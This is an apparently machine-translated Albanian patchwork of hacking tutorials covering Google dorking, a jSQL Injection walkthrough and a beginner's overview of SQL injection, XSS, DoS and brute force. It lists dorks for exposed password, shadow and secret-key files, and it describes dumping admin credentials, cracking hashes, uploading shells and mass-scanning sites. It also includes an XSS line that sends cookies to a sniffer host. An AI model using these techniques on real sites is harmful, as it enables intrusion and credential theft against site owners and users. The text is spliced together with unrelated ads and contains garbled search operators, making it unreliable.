Kjo komandë është veçanërisht e dobishme për ata që nuk kanë SNORT - të paktën ata mund të shohin se si funksionon në një sistem real.

Metodat e hakimit të Google

Pra, zbuluam se, duke përdorur një kombinim të operatorëve dhe fjalëve kyçe të mësipërme, çdokush mund të mbledhë informacionin e nevojshëm dhe të kërkojë dobësi. Këto teknika shpesh quhen Google Hacking.

Harta e faqes

Ju mund të përdorni deklaratën e faqes: për të parë të gjitha lidhjet që Google ka gjetur në sajt. Zakonisht, faqet që krijohen në mënyrë dinamike nga skriptet nuk indeksohen duke përdorur parametra, kështu që disa sajte përdorin filtra ISAPI në mënyrë që lidhjet të mos jenë në formën /article.asp?num=10&dst=5, por me prerje /article/abc/num/10/dst/5. Kjo bëhet për të siguruar që faqja në përgjithësi të indeksohet nga motorët e kërkimit.

Le te perpiqemi:

faqja: www.whitehouse.gov Whitehouse

Google mendon se çdo faqe në një faqe përmban fjalën Whitehouse. Kjo është ajo që ne përdorim për të marrë të gjitha faqet.
Ekziston edhe një version i thjeshtuar:

site:whitehouse.gov

Dhe pjesa më e mirë është se shokët nga whitehouse.gov as që e dinin që ne shikuam strukturën e faqes së tyre dhe madje shikuam në faqet e ruajtura në memorie që Google shkarkoi vetë. Kjo mund të përdoret për të studiuar strukturën e faqeve dhe për të parë përmbajtjen pa u vënë re për momentin.

Listimi i skedarëve në drejtori

Serverët WEB mund të shfaqin lista të drejtorive të serverëve në vend të të zakonshmes faqet HTML. Kjo zakonisht bëhet në mënyrë që përdoruesit të zgjedhin dhe shkarkojnë skedarë të caktuar. Megjithatë, në shumë raste administratorët nuk kanë ndërmend të tregojnë përmbajtjen e një drejtorie. Kjo ndodh për shkak të konfigurimit të gabuar të serverit ose mungesës së tij faqja kryesore në drejtori. Si rezultat, hakeri ka një shans për të gjetur diçka interesante në drejtori dhe ta përdorë atë për qëllimet e tij. Për të gjetur të gjitha faqet e tilla, mjafton të vërehet se të gjitha përmbajnë fjalët: index of në titullin e tyre. Por meqenëse indeksi i fjalëve nuk përmban vetëm faqe të tilla, ne duhet të përsosim pyetjen dhe të marrim parasysh fjalët kyçe në vetë faqen, kështu që pyetjet si:

intitle:indeks.i drejtorisë prind
titull:indeks.i madhësisë së emrit

Meqenëse shumica e listimeve të drejtorive janë të qëllimshme, mund ta keni të vështirë herën e parë të gjeni listime të gabuara. Por të paktën do të jeni në gjendje të përdorni listat për të përcaktuar versionin e serverit WEB, siç përshkruhet më poshtë.

Marrja e versionit të serverit WEB.

Njohja e versionit të serverit WEB është gjithmonë e dobishme përpara se të filloni ndonjë sulm hakeri. Përsëri falë Google është e mundur të merrni këtë informacion pa u lidhur me një server. Nëse shikoni me kujdes listën e drejtorive, mund të shihni se emri i serverit WEB dhe versioni i tij shfaqen aty.

Apache1.3.29 - Server ProXad në trf296.free.fr Porta 80

Një administrator me përvojë mund ta ndryshojë këtë informacion, por, si rregull, është e vërtetë. Kështu, për të marrë këtë informacion, mjafton të dërgoni një kërkesë:

titulli:index.of server.at

Për të marrë informacion për një server specifik, ne përsosim kërkesën:

intitle:index.of server.at site:ibm.com

Ose anasjelltas, ne jemi duke kërkuar për serverë që funksionojnë në një version specifik të serverit:

intitle:index.of Apache/2.0.40 Server në

Kjo teknikë mund të përdoret nga një haker për të gjetur një viktimë. Nëse, për shembull, ai ka një shfrytëzim për një version të caktuar të serverit WEB, atëherë ai mund ta gjejë atë dhe të provojë shfrytëzimin ekzistues.

Mund të merrni gjithashtu versionin e serverit duke parë faqet që janë instaluar si parazgjedhje kur instaloni një version të ri të serverit WEB. Për shembull, për të parë faqen e testimit të Apache 1.2.6, thjesht shkruani

titulli:Test.Page.for.Apache it.punoi!

Për më tepër, disa sisteme operative instalojnë dhe lëshojnë menjëherë serverin WEB gjatë instalimit. Megjithatë, disa përdorues nuk janë as të vetëdijshëm për këtë. Natyrisht, nëse shihni se dikush nuk e ka fshirë faqen e paracaktuar, atëherë është logjike të supozohet se kompjuteri nuk i është nënshtruar fare konfigurimit dhe ndoshta është i prekshëm ndaj sulmeve.

Provoni të kërkoni për faqet IIS 5.0

allintitle:Mirë se vini në Shërbimet e Internetit të Windows 2000

Në rastin e IIS, ju mund të përcaktoni jo vetëm versionin e serverit, por edhe Versioni i Windows dhe paketën e shërbimit.

Një mënyrë tjetër për të përcaktuar versionin e serverit WEB është kërkimi i manualeve (faqet e ndihmës) dhe shembujt që mund të instalohen në sit si parazgjedhje. Hakerët kanë gjetur shumë mënyra për t'i përdorur këta komponentë për të fituar akses të privilegjuar në faqe. Kjo është arsyeja pse ju duhet t'i hiqni këto përbërës në vendin e prodhimit. Për të mos përmendur faktin se me praninë e këtyre komponentëve mund të merrni informacione për llojin e serverit dhe versionin e tij. Për shembull, le të gjejmë manualin e apache:

modulet e direktivave inurl: manual apache

Përdorimi i Google si një skaner CGI.

Skaneri CGI ose skaneri WEB është një mjet për kërkimin e skripteve dhe programeve të cenueshme në serverin e viktimës. Këto shërbime duhet të dinë se çfarë të kërkojnë, për këtë ata kanë një listë të tërë skedarësh të cenueshëm, për shembull:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Ne mund ta gjejmë secilin prej këtyre skedarëve duke përdorur Google, duke përdorur gjithashtu fjalët index of ose inurl me emrin e skedarit në shiritin e kërkimit: ne mund të gjejmë sajte me skripte të cenueshme, për shembull:

allinurl:/random_banner/index.cgi

Me njohuri shtesë, një haker mund të shfrytëzojë një dobësi të skriptit dhe të përdorë dobësinë për të detyruar skriptin të shërbejë çdo skedar të ruajtur në server. Për shembull një skedar fjalëkalimi.

Si të mbroheni nga hakimi përmes Google.

1. Mos ngarkoni të dhëna të rëndësishme në serverin WEB.

Edhe nëse i keni postuar të dhënat përkohësisht, mund t'i harroni ose dikush do të ketë kohë t'i gjejë dhe t'i marrë këto të dhëna përpara se t'i fshini ato. Mos e bëj. Ka shumë mënyra të tjera për të transferuar të dhëna që e mbrojnë atë nga vjedhja.

2. Kontrolloni faqen tuaj.

Përdorni metodat e përshkruara për të hulumtuar faqen tuaj. Kontrolloni periodikisht faqen tuaj për metoda të reja që shfaqen në faqen http://johnny.ihackstuff.com. Mos harroni se nëse doni të automatizoni veprimet tuaja, duhet të merrni leje speciale nga Google. Nëse lexoni me kujdes http://www.google.com/terms_of_service.html, atëherë do të shihni frazën: Nuk mund të dërgoni pyetje të automatizuara të asnjë lloji në sistemin e Google pa lejen e shprehur paraprakisht nga Google.

3. Mund të mos keni nevojë që Google të indeksojë faqen tuaj ose një pjesë të saj.

Google ju lejon të hiqni një lidhje në faqen tuaj ose një pjesë të saj nga baza e të dhënave të saj, si dhe të hiqni faqet nga cache. Përveç kësaj, ju mund të ndaloni kërkimin e imazheve në faqen tuaj, të ndaloni shfaqjen e fragmenteve të shkurtra të faqeve në rezultatet e kërkimit Të gjitha mundësitë për fshirjen e një siti përshkruhen në faqe http://www.google.com/remove.html. Për ta bërë këtë, duhet të konfirmoni që jeni me të vërtetë pronari i kësaj faqeje ose të futni etiketa në faqe ose

4. Përdor robots.txt

Dihet që motorët e kërkimit shikojnë skedarin robots.txt në rrënjë të faqes dhe nuk indeksojnë ato pjesë që janë shënuar me fjalën Mos lejo. Ju mund ta përdorni këtë për të parandaluar indeksimin e një pjese të sajtit. Për shembull, për të shmangur indeksimin e të gjithë sajtit, krijoni një skedar robots.txt që përmban dy rreshta:

Agjenti i përdoruesit: *
mos lejo:/

Çfarë ndodh tjetër

Që jeta të mos ju duket mjaltë, në fund do të them se ka faqe që ndjekin ata njerëz që, duke përdorur metodat e mësipërme, kërkojnë vrima në skriptet dhe serverët WEB. Një shembull i një faqeje të tillë është

Shtojca.

Pak e ëmbël. Provoni vetë një nga sa vijon:

1. #mysql dump filetype:sql - kërko për deponime të bazës së të dhënave të dhënat mySQL
2. Raporti përmbledhës i dobësisë së hostit - do t'ju tregojë se cilat dobësi kanë gjetur njerëzit e tjerë
3. phpMyAdmin funksionon në inurl:main.php - kjo do të detyrojë mbylljen e kontrollit nëpërmjet panelit phpmyadmin
4. Jo për shpërndarje konfidenciale
5. Kërko Detajet e Kontrollit të Variablave të Serverit të Pemës
6. Vrapimi në modalitetin e fëmijëve
7. Ky raport është krijuar nga WebLog
8. titulli:indeksi.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs - ndoshta dikush ka nevojë për skedarë të konfigurimit të murit të zjarrit? :)
10. titulli:indeksi.i financave.xls - hmm....
11. titulli:Indeksi i bisedave dbconvert.exe - regjistrat e bisedave icq
12. intext:Analiza e trafikut të Tobias Oetiker
13. titulli:Statistikat e përdorimit për Generated by Webalizer
14. titulli:statistikat e statistikave të avancuara të internetit
15. intitle:index.of ws_ftp.ini - ws ftp config
16. inurl:ipsec.secrets mban sekrete të përbashkëta - çelës sekret - gjetje e mirë
17. inurl:main.php Mirë se vini në phpMyAdmin
18. inurl:server-info Informacioni i serverit Apache
19. site:edu notat admin
20. ORA-00921: fund i papritur i komandës SQL - merr shtigjet
21. titulli:indeks.i trillian.ini
22. titulli:Indeksi i pwd.db
23. titulli:indeks.i njerezve.lst
24. titulli:indeksi.i masterit.passwd
25.inurl:passlist.txt
26. titulli:Indeksi i .mysql_history
27. titulli:indeksi i tekstit:globals.inc
28. titulli:indeksi.i administratorëve.pwd
29. titulli:Indeksi.e etj hije
30. titulli:indeksi.of secring.fq
31. inurl:config.php dbuname dbpass
32. inurl:perform filetype:ini

  • "Hakimi i Google"
  • Qendra e trajnimit "Informzaschita" http://www.itsecurity.ru - një qendër kryesore e specializuar në fushën e arsimit siguria e informacionit(Licenca e Komitetit të Arsimit të Moskës Nr. 015470, Akreditimi Shtetëror Nr. 004251). E vetmja qendër trajnimi e autorizuar e Sistemeve të Sigurisë në Internet dhe Clearswift në Rusi dhe vendet e CIS. Qendër trajnimi e autorizuar nga Microsoft (specializimi i sigurisë). Programet e trajnimit koordinohen me Komisionin Teknik Shtetëror të Rusisë, FSB (FAPSI). Certifikatat e trajnimit dhe dokumentet shtetërore për formimin e avancuar.

    SoftKey është shërbim unik për blerësit, zhvilluesit, tregtarët dhe partnerët e filialeve. Për më tepër, ky është një nga dyqanet më të mira të softuerëve në internet në Rusi, Ukrainë, Kazakistan, i cili u ofron klientëve një gamë të gjerë, shumë mënyra pagese, përpunim të shpejtë (shpesh të menjëhershëm) të porosive, ndjekje të procesit të përmbushjes së porosisë në seksionin personal, zbritje të ndryshme nga dyqani dhe prodhuesit ON.

    Ekzekutoni skedarin e shkarkuar klikoni dy herë(Duhet të ketë Makine virtuale ).

    3. Anonimiteti kur kontrolloni faqen për injeksione SQL

    Vendosja e Tor dhe Privoxy në Kali Linux

    [Seksioni në zhvillim]

    Konfigurimi i Tor dhe Privoxy në Windows

    [Seksioni në zhvillim]

    Cilësimet e përfaqësuesit të injektimit jSQL

    [Seksioni në zhvillim]

    4. Kontrollimi i faqes për injeksion SQL me jSQL Injection

    Puna me programin është jashtëzakonisht e thjeshtë. Thjesht futni adresën e faqes dhe shtypni ENTER.

    Pamja e mëposhtme e ekranit tregon se siti është i prekshëm ndaj tre llojeve të injeksioneve SQL menjëherë (informacioni rreth tyre tregohet në këndin e poshtëm të djathtë). Duke klikuar mbi emrat e injeksioneve, mund të ndërroni metodën e përdorur:

    Gjithashtu, ne kemi shfaqur tashmë bazat e të dhënave ekzistuese.

    Ju mund të shihni përmbajtjen e secilës tabelë:

    Zakonisht, pjesa më interesante e tabelave janë kredencialet e administratorit.

    Nëse jeni me fat dhe keni gjetur të dhënat e administratorit, atëherë është shumë herët për t'u gëzuar. Ju gjithashtu duhet të gjeni panelin e administratorit, ku mund të futni këto të dhëna.

    5. Kërkoni për administratorë me jSQL Injection

    Për ta bërë këtë, shkoni në skedën tjetër. Këtu jemi takuar nga një listë e adresave të mundshme. Ju mund të zgjidhni një ose më shumë faqe për të kontrolluar:

    Lehtësia është se nuk keni nevojë të përdorni programe të tjera.

    Fatkeqësisht, nuk ka shumë programues të pakujdesshëm që ruajnë fjalëkalimet në tekst të qartë. Shumë shpesh në vargun e fjalëkalimit shohim diçka të tillë

    8743b52063cd84097a65d1633f5c74f5

    Ky është një hash. Ju mund ta deshifroni atë me forcë brutale. Dhe… jSQL Injection ka një brute-forcer të integruar.

    6. Hashe me forcë brutale me jSQL Injection

    Lehtësia e padyshimtë është se nuk keni nevojë të kërkoni programe të tjera. Ka mbështetje për shumë nga hash-et më të njohura.

    Ky nuk është alternativa më e mirë. Për t'u bërë një guru në deshifrimin e hasheve, rekomandohet libri "" në Rusisht.

    Por, sigurisht, kur nuk ka asnjë program tjetër në dispozicion ose nuk ka kohë për të studiuar, jSQL Injection me një funksion të integruar të forcës brutale do të jetë i dobishëm.

    Ka cilësime: mund të vendosni se cilat karaktere përfshihen në fjalëkalim, diapazoni i gjatësisë së fjalëkalimit.

    7. Operacionet e skedarit pas zbulimit të injektimit SQL

    Përveç operacioneve me bazat e të dhënave - leximi dhe modifikimi i tyre, nëse zbulohen injeksione SQL, mund të kryhen operacionet e mëposhtme të skedarëve:

    • leximi i skedarëve në server
    • ngarkimi i skedarëve të rinj në server
    • ngarkimi i predhave në server

    Dhe e gjithë kjo zbatohet në jSQL Injection!

    Ka kufizime - serveri SQL duhet të ketë privilegje skedari. E arsyeshme administratorët e sistemit ata janë të paaftë dhe qasje në sistemi i skedarëve nuk mund të merret.

    Prania e privilegjeve të skedarëve është mjaft e lehtë për t'u kontrolluar. Shkoni te një nga skedat (leximi i skedarëve, krijimi i një predhe, ngarkimi i një skedari të ri) dhe përpiquni të kryeni një nga operacionet e treguara.

    Një tjetër shënim shumë i rëndësishëm - ne duhet të dimë rrugën e saktë absolute të skedarit me të cilin do të punojmë - përndryshe asgjë nuk do të funksionojë.

    Shikoni pamjen e mëposhtme të ekranit:

    Çdo përpjekje për të vepruar në një skedar përgjigjet nga: Nuk ka privilegj FILE(pa privilegje skedari). Dhe këtu nuk mund të bëhet asgjë.

    Nëse në vend të kësaj keni një gabim tjetër:

    Problem me shkrimin në [emri_directory]

    Kjo do të thotë që ju keni specifikuar gabimisht rrugën absolute ku dëshironi të shkruani skedarin.

    Për të marrë një rrugë absolute, duhet të paktën të dihet sistemi operativ në të cilin serveri po funksionon. Për ta bërë këtë, kaloni në skedën Rrjeti.

    Një hyrje e tillë (varg Win64) na jep arsye të supozojmë se kemi të bëjmë me Windows OS:

    Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Lidhja: Keep-Alive Metoda: HTTP/1.1 200 OK Content-Length: 353 Data: Pre, 11 Dhjetor 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Lloji i përmbajtjes: tekst/html; charset=UTF-8

    Këtu kemi disa Unix (*BSD, Linux):

    Transferimi-Enkodimi: i copëtuar Data: e Premte, 11 Dhjetor 2015 11:57:02 GMT Metoda: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Lidhja: keep-alive Lloji i përmbajtjes: tekst/html X- Mundësuar nga: PHP/5.3.29 Serveri: Apache/2.2.31 (Unix)

    Dhe këtu kemi CentOS:

    Metoda: HTTP/1.1 200 OK Skadon: E enjte, 19 nëntor 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Lidhja: keep-alive X-Cache-Lookup: MISS nga t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS nga t1.hoster.ru Cache-Control: no-story, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: pa cache Data: Pre, 11 dhjetor 2015 12:08:54 GMT Transferimi-Enkodimi: i copëtuar Lloji i Përmbajtjes: tekst/html; charset=WINDOWS-1251

    Në Windows, një dosje tipike e sajtit është C:\Server\data\htdocs\. Por, në fakt, nëse dikush "mendoi" të bënte një server në Windows, atëherë, me shumë mundësi, ky person nuk ka dëgjuar asgjë për privilegjet. Prandaj, duhet të filloni të provoni direkt nga drejtoria C: / Windows /:

    Siç mund ta shihni, gjithçka shkoi në mënyrë perfekte herën e parë.

    Por vetë predhat e jSQL Injection ngrenë dyshimet e mia. Nëse keni privilegje skedari, atëherë mund të ngarkoni diçka me një ndërfaqe në internet.

    8. Vendet e kontrollit në masë për injeksione SQL

    Dhe madje edhe jSQL Injection e ka këtë veçori. Gjithçka është jashtëzakonisht e thjeshtë - ngarkoni një listë faqesh (mund të importohen nga një skedar), zgjidhni ato që dëshironi të kontrolloni dhe klikoni butonin e duhur për të filluar funksionimin.

    Dalje nga jSQL Injection

    jSQL Injection është një mjet i mirë dhe i fuqishëm për gjetjen dhe më pas përdorimin e injeksioneve SQL që gjenden në sajte. Përparësitë e tij të padyshimta: lehtësia e përdorimit, funksionet e integruara të lidhura. jSQL Injection mund të jetë miku më i mirë i një fillestari kur analizon faqet e internetit.

    Nga të metat, do të vëreja pamundësinë e redaktimit të bazave të të dhënave (të paktën nuk e gjeta këtë funksionalitet). Ashtu si me të gjitha mjetet me një ndërfaqe grafike, pamundësia për t'u përdorur në skriptet mund t'i atribuohet disavantazheve të këtij programi. Sidoqoftë, njëfarë automatizimi është i mundur edhe në këtë program - falë funksionit të integruar të kontrollit masiv të faqes.

    jSQL Injection është shumë më i përshtatshëm për t'u përdorur sesa sqlmap. Por sqlmap mbështet më shumë lloje të injektimit SQL, ka opsione të murit të zjarrit të skedarëve dhe disa veçori të tjera.

    Përfundimi: jSQL Injection është miku më i mirë i një hakeri fillestar.

    Ju mund të gjeni ndihmë për këtë program në Enciklopedinë Kali Linux në këtë faqe: http://kali.tools/?p=706

    Vendosa të flas pak për sigurinë e informacionit. Artikulli do të jetë i dobishëm për programuesit fillestarë dhe ata që sapo kanë filluar të bëjnë zhvillimin e Frontend. Cili është problemi?

    Shumë zhvillues fillestarë janë aq të varur nga shkrimi i kodit sa harrojnë plotësisht sigurinë e punës së tyre. Dhe më e rëndësishmja, ata harrojnë dobësi të tilla si pyetja SQL, XXS. Ata gjithashtu krijojnë fjalëkalime të lehta për panelet e tyre administrative dhe i nënshtrohen forcës brutale. Cilat janë këto sulme dhe si mund të shmangen?

    injeksion SQL

    Injeksioni SQL është lloji më i zakonshëm i sulmit të bazës së të dhënave që kryhet me një pyetje SQL për një DBMS specifike. Shumë njerëz dhe madje edhe kompani të mëdha vuajnë nga sulme të tilla. Arsyeja është gabimi i një zhvilluesi kur shkruan një bazë të dhënash dhe, në fakt, pyetjet SQL.

    Një sulm i llojit të injektimit SQL është i mundur për shkak të përpunimit të gabuar të të dhënave hyrëse të përdorura në pyetjet SQL. Me një sulm të suksesshëm nga një haker, ju rrezikoni të humbni jo vetëm përmbajtjen e bazave të të dhënave, por edhe fjalëkalimet dhe regjistrat e panelit administrativ, përkatësisht. Dhe këto të dhëna do të jenë mjaft të mjaftueshme për të marrë plotësisht faqen ose për të bërë rregullime të pakthyeshme në të.

    Sulmi mund të riprodhohet me sukses në skriptet e shkruara në PHP, ASP, Perl dhe gjuhë të tjera. Suksesi i sulmeve të tilla varet më shumë nga ajo se cila DBMS përdoret dhe si zbatohet vetë skenari. Ka shumë site të cenueshme për injeksione SQL në botë. Kjo është e lehtë për t'u verifikuar. Mjafton të futni "dorks" - këto janë kërkesa të veçanta për gjetjen e vendeve të cenueshme. Ja disa prej tyre:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    Si t'i përdorni ato? Mjafton t'i futni ato në motorin e kërkimit Google ose Yandex. Motori i kërkimit do t'ju japë jo vetëm një faqe të cenueshme, por edhe një faqe për këtë dobësi. Por ne nuk do të ndalemi këtu dhe do të sigurohemi që faqja të jetë vërtet e cenueshme. Për këtë mjafton të vendosni një thonjëza të vetme “‘” pas vlerës “id=1”. Diçka si kjo:

    • inurl:games.php?id=1'

    Dhe faqja do të na japë një gabim në lidhje me pyetjen SQL. Çfarë i nevojitet më pas hakerit tonë?

    Dhe pastaj ai ka nevojë për këtë lidhje me faqen me një gabim. Pastaj puna për cenueshmërinë në shumicën e rasteve bëhet në shpërndarjen "Kali linux" me shërbimet e saj për këtë pjesë: futja e kodit të injektimit dhe kryerja e operacioneve të nevojshme. Se si do të ndodhë kjo, nuk mund t'ju them. Por ju mund të gjeni informacione për këtë në internet.

    Sulmi XSS

    Ky lloj sulmi kryhet në Biskota. Ata, nga ana tjetër, janë shumë të dashur për të shpëtuar përdoruesit. Pse jo? Si pa to? Në fund të fundit, falë Cookies, ne nuk futim një fjalëkalim nga Vk.com ose Mail.ru njëqind herë. Dhe të paktë janë ata që i refuzojnë. Por në internet, shpesh shfaqet një rregull për hakerat: koeficienti i komoditetit është drejtpërdrejt proporcional me koeficientin e pasigurisë.

    Për të zbatuar një sulm XSS, hakeri ynë ka nevojë për njohuri JavaScript. Gjuha në shikim të parë është shumë e thjeshtë dhe e padëmshme, sepse nuk ka akses në burimet kompjuterike. Një haker mund të punojë me JavaScript vetëm në një shfletues, por kjo është e mjaftueshme. Në fund të fundit, gjëja kryesore është të futni kodin në faqen e internetit.

    Nuk do të hyj në detaje rreth procesit të sulmit. Unë do të tregoj vetëm bazat dhe kuptimin se si ndodh kjo.

    Një haker mund të shtojë kodin JS në një forum ose libër të ftuar:

    Skriptet na ridrejtojnë në një faqe të infektuar ku do të ekzekutohet kodi: qoftë ai një sniffer, një lloj ruajtjeje ose një shfrytëzim që do të vjedhë disi Cookies tona nga cache.

    Pse JavaScript? Sepse JavaScript është i shkëlqyeshëm me kërkesat në ueb dhe ka akses në cookie. Por nëse skripti ynë do të na transferojë në ndonjë sit, atëherë përdoruesi do ta vërejë lehtësisht këtë. Këtu, hakeri përdor një mundësi më dinake - ai thjesht fut kodin në foto.

    Img=imazhi i ri();

    Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

    Ne thjesht krijojmë një imazh dhe i caktojmë skriptin tonë si adresë.

    Si të mbroheni nga e gjithë kjo? Shumë e thjeshtë - mos ndiqni lidhje të dyshimta.

    Sulmet DoS dhe DDos


    DoS (nga anglishtja Denial of Service - refuzimi i shërbimit) sulm hakeri në një sistem kompjuterik për ta sjellë atë në dështim. Kjo është krijimi i kushteve të tilla në të cilat përdoruesit e ndërgjegjshëm të sistemit nuk mund të aksesojnë ato të ofruara burimet e sistemit(serverët), ose kjo qasje është e vështirë. Dështimi i sistemit mund të jetë gjithashtu një hap drejt kapjes së tij nëse, në një situatë emergjente, softueri jep ndonjë informacion kritik: për shembull, versionin, një pjesë të kodit të programit, etj. Por më së shpeshti është një masë e Presioni ekonomik: humbja e një shërbimi të thjeshtë që gjeneron të ardhura. Faturat nga ofruesi ose masat për të shmangur sulmin godasin ndjeshëm "objektivin" në xhep. Aktualisht, sulmet DoS dhe DDoS janë më të njohurit, pasi ato ju lejojnë të çoni në dështim pothuajse çdo sistem pa lënë prova të rëndësishme ligjore.

    Cili është ndryshimi midis sulmeve DoS dhe DDos?

    DoS është një sulm i ndërtuar në një mënyrë të zgjuar. Për shembull, nëse serveri nuk kontrollon korrektësinë e paketave hyrëse, atëherë një haker mund të bëjë një kërkesë të tillë që do të përpunohet përgjithmonë dhe nuk do të ketë kohë të mjaftueshme të procesorit për të punuar me lidhje të tjera. Prandaj, klientët do të marrin një refuzim të shërbimit. Por nuk do të funksionojë të mbingarkoni ose çaktivizoni faqet e mëdha të njohura në këtë mënyrë. Ata janë të armatosur me kanale mjaft të gjera dhe serverë super të fuqishëm që mund të përballojnë lehtësisht një mbingarkesë të tillë.

    DDoS është në të vërtetë i njëjti sulm si DoS. Por nëse në DoS ka një paketë kërkese, atëherë në DDoS mund të ketë shumë mirë qindra ose më shumë prej tyre. Edhe serverët e rëndë mund të mos jenë në gjendje të përballojnë një mbingarkesë të tillë. Unë do t'ju jap një shembull.

    Një sulm DoS është kur jeni duke biseduar me dikë, por më pas vjen një person i keq dhe fillon të bërtasë me zë të lartë. Të flasësh është ose e pamundur ose shumë e vështirë. Zgjidhja: telefononi sigurinë, e cila do ta qetësojë dhe do ta nxjerrë personin nga dhoma. Sulmet DDoS ndodhin kur mijëra njerëz të tillë të paedukuar vrapojnë. Në këtë rast, rojet nuk do të jenë në gjendje të përdredhin dhe t'i largojnë të gjithë.

    DoS dhe DDoS prodhohen nga kompjuterët, të ashtuquajturit zombies. Këta janë kompjuterë të përdoruesve të hakeruar nga hakerat, të cilët as nuk dyshojnë se makina e tyre është përfshirë në sulmin e ndonjë serveri.

    Si të mbroheni nga kjo? Në përgjithësi, në asnjë mënyrë. Por ju mund ta komplikoni detyrën e një hakeri. Për ta bërë këtë, ju duhet të zgjidhni një host të mirë me serverë të fuqishëm.

    Sulm me forcë brutale

    Një zhvillues mund të krijojë shumë sisteme të mbrojtjes nga sulmet, të rishikojë plotësisht skriptet që kemi shkruar, të kontrollojë faqen për dobësi, etj. Por kur bëhet fjalë për hapin e fundit të paraqitjes së faqes, domethënë kur ai thjesht do të vendosë një fjalëkalim në panelin e administratorit, ai mund të harrojë një gjë. Fjalëkalimi!

    Nuk rekomandohet fuqimisht të vendosni një fjalëkalim të thjeshtë. Mund të jetë 12345, 1114457, vasya111, etj. Nuk rekomandohet vendosja e fjalëkalimeve me gjatësi më të vogël se 10-11 karaktere. Përndryshe, mund t'i nënshtroheni sulmit më të zakonshëm dhe jo kompleks - Brute Force.

    Brute force është një sulm brute-force me fjalëkalim i bazuar në fjalor duke përdorur programe speciale. Fjalorët mund të jenë të ndryshëm: latinisht, të renditur sipas numrave, le të themi deri në një gamë, të përzier (latinisht + numra), madje ka fjalorë me simbole unike @#4$%&*~~`'”\ ? etj.

    Sigurisht, ky lloj sulmi është i lehtë për t'u shmangur, mjafton të dalësh me një fjalëkalim kompleks. Edhe captcha mund t'ju shpëtojë. Dhe gjithashtu, nëse faqja juaj është krijuar në CMS, atëherë shumë prej tyre llogarisin një lloj të ngjashëm sulmi dhe bllokojnë ip. Gjithmonë duhet të kujtojmë se sa më shumë karaktere të ndryshme në fjalëkalim, aq më e vështirë është marrja e tij.

    Si funksionojnë hakerat? Në shumicën e rasteve, ata ose dyshojnë ose tashmë e dinë një pjesë të fjalëkalimit. Është mjaft logjike të supozohet se fjalëkalimi i përdoruesit me siguri nuk do të përbëhet nga 3 ose 5 karaktere. Fjalëkalime të tilla çojnë në hakime të shpeshta. Në thelb, hakerët marrin një gamë prej 5 deri në 10 karaktere dhe shtojnë atje disa karaktere që ata ndoshta i dinë paraprakisht. Më pas, gjeneroni fjalëkalime me diapazonin e dëshiruar. Shpërndarja Kali linux madje ka programe për raste të tilla. Dhe voila, sulmi nuk do të zgjasë më shumë, pasi vëllimi i fjalorit nuk është më aq i madh. Përveç kësaj, një haker mund të përdorë fuqinë e kartës video. Disa prej tyre mbështesin sistemin CUDA, ndërsa shpejtësia e numërimit rritet deri në 10 herë. Dhe tani ne shohim se sulmi është në një mënyrë të thjeshtë mjaft reale. Por jo vetëm faqet i nënshtrohen forcës brutale.

    Të nderuar zhvillues, mos harroni kurrë sistemin e sigurisë së informacionit, sepse sot shumë njerëz, përfshirë shtetet, vuajnë nga sulme të tilla. Në fund të fundit, dobësia më e madhe është një person që gjithmonë mund të shpërqendrohet diku ose të anashkalojë diku. Ne jemi programues, por jo makina të programuara. Jini gjithmonë në gatishmëri, sepse humbja e informacionit kërcënon me pasoja të rënda!